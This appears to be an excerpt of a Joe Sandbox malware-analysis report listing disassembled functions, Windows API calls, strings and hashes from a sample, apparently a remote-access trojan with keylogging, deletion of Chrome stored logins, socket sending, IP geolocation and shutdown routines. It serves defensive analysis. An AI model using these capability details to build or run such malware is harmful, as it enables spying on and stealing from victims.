              • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
            • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
            • HeapAlloc.KERNEL32(00000000), ref: 0041087C
            • SetLastError.KERNEL32(0000045A), ref: 0041098F
              • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
              • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
            • String ID: $.F
            • API String ID: 3950776272-1421728423
            • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
            • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
            • Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
            • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
            APIs
            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
            • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressCloseCreateLibraryLoadProcsend
            • String ID: SHDeleteKeyW$Shlwapi.dll
            • API String ID: 2127411465-314212984
            • Opcode ID: 95394845dcc8446550d74d224a9db9872a36ac6ce2722934ea231da13fa01e82
            • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
            • Opcode Fuzzy Hash: 95394845dcc8446550d74d224a9db9872a36ac6ce2722934ea231da13fa01e82
            • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
            APIs
            • _free.LIBCMT ref: 00446741
            • _free.LIBCMT ref: 00446765
            • _free.LIBCMT ref: 004468EC
            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
            • _free.LIBCMT ref: 00446AB8
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$ByteCharMultiWide$InformationTimeZone
            • String ID:
            • API String ID: 314583886-0
            • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
            • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
            • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
            • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
            APIs
              • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
              • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
              • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
            • Sleep.KERNEL32(00000BB8), ref: 0040E243
            • ExitProcess.KERNEL32 ref: 0040E2B4
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseExitOpenProcessQuerySleepValue
            • String ID: 3.8.0 Pro$override$pth_unenc$!G
            • API String ID: 2281282204-1386060931
            • Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
            • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
            • Opcode Fuzzy Hash: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
            • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
            APIs
            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
            • InternetCloseHandle.WININET(00000000), ref: 00419407
            • InternetCloseHandle.WININET(00000000), ref: 0041940A
            Strings
            • http://geoplugin.net/json.gp, xrefs: 004193A2
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Internet$CloseHandleOpen$FileRead
            • String ID: http://geoplugin.net/json.gp
            • API String ID: 3121278467-91888290
            • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
            • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
            • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
            • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
            APIs
            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
            • GetLastError.KERNEL32 ref: 0040A999
            Strings
            • UserProfile, xrefs: 0040A95F
            • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
            • [Chrome StoredLogins not found], xrefs: 0040A9B3
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: DeleteErrorFileLast
            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
            • API String ID: 2018770650-1062637481
            • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
            • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
            • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
            • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
            APIs
            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
            • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
            • GetLastError.KERNEL32 ref: 00415CDB
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
            • String ID: SeShutdownPrivilege
            • API String ID: 3534403312-3733053543
            • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
            • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
            • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
            • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
            APIs
            • __EH_prolog.LIBCMT ref: 00408393
              • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
            • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
              • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
              • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
              • Part of subcall function 00404E06: FindCloseChangeNotification.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
            • FindClose.KERNEL32(00000000), ref: 004086F4
              • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
              • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
            • String ID:
            • API String ID: 2435342581-0
            • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
            • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
            • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
            • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
            APIs
            • GetForegroundWindow.USER32 ref: 0040949C
            • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
            • GetKeyboardLayout.USER32(00000000), ref: 004094AE
            • GetKeyState.USER32(00000010), ref: 004094B8
            • GetKeyboardState.USER32(?), ref: 004094C5
            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
            • String ID:
            • API String ID: 3566172867-0
            • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
            • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
            • Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
            • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
            APIs
            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
            • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
            • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
            • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$Open$ManagerStart
            • String ID:
            • API String ID: 276877138-0
            • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
            • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
            • Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
            • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
            APIs
            • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
              • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$Find$CreateFirstNext
            • String ID: H"G$`'G$`'G
            • API String ID: 341183262-2774397156
            • Opcode ID: 0d80ee79194906e4b22a720edc884f9e90fb3bc84ee362b2e3278aa21dcfc2fa
            • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
            • Opcode Fuzzy Hash: 0d80ee79194906e4b22a720edc884f9e90fb3bc84ee362b2e3278aa21dcfc2fa
            • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
            APIs
              • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
              • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
              • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
              • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
              • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
            • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
            • GetProcAddress.KERNEL32(00000000), ref: 00414E72
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
            • String ID: PowrProf.dll$SetSuspendState
            • API String ID: 1589313981-1420736420
            • Opcode ID: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
            • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
            • Opcode Fuzzy Hash: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
            • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
            APIs
            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
            • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: InfoLocale
            • String ID: ACP$OCP
            • API String ID: 2299586839-711371036
            • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
            • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
            • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
            • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
            APIs
            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
            • wsprintfW.USER32 ref: 0040A13F
              • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: EventLocalTimewsprintf
            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
            • API String ID: 1497725170-248792730
            • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
            • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
            • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
            • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
            APIs
            • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
            • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
            • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
            • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Resource$FindLoadLockSizeof
            • String ID: SETTINGS
            • API String ID: 3473537107-594951305
            • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
            • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
            • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
            • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
            APIs
            • __EH_prolog.LIBCMT ref: 004087A5
            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
            • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Find$File$CloseFirstH_prologNext
            • String ID:
            • API String ID: 1157919129-0
            • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
            • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
            • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
            • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
              • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
            • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
            • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
            • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
            • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
            • String ID:
            • API String ID: 745075371-0
            • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
            • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
            • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
            • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
            APIs
            • __EH_prolog.LIBCMT ref: 0040784D
            • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Find$File$CloseException@8FirstH_prologNextThrow
            • String ID:
            • API String ID: 1771804793-0
            • Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
            • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
            • Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
            • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
            APIs
              • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
            • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
              • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
              • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
            • String ID:
            • API String ID: 1735047541-0
            • Opcode ID: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
            • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
            • Opcode Fuzzy Hash: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
            • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: A%E$A%E
            • API String ID: 0-137320553
            • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
            • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
            • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
            • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
            APIs
            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
              • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
              • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
              • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCreateInfoParametersSystemValue
            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
            • API String ID: 4127273184-3576401099
            • Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
            • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
            • Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
            • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
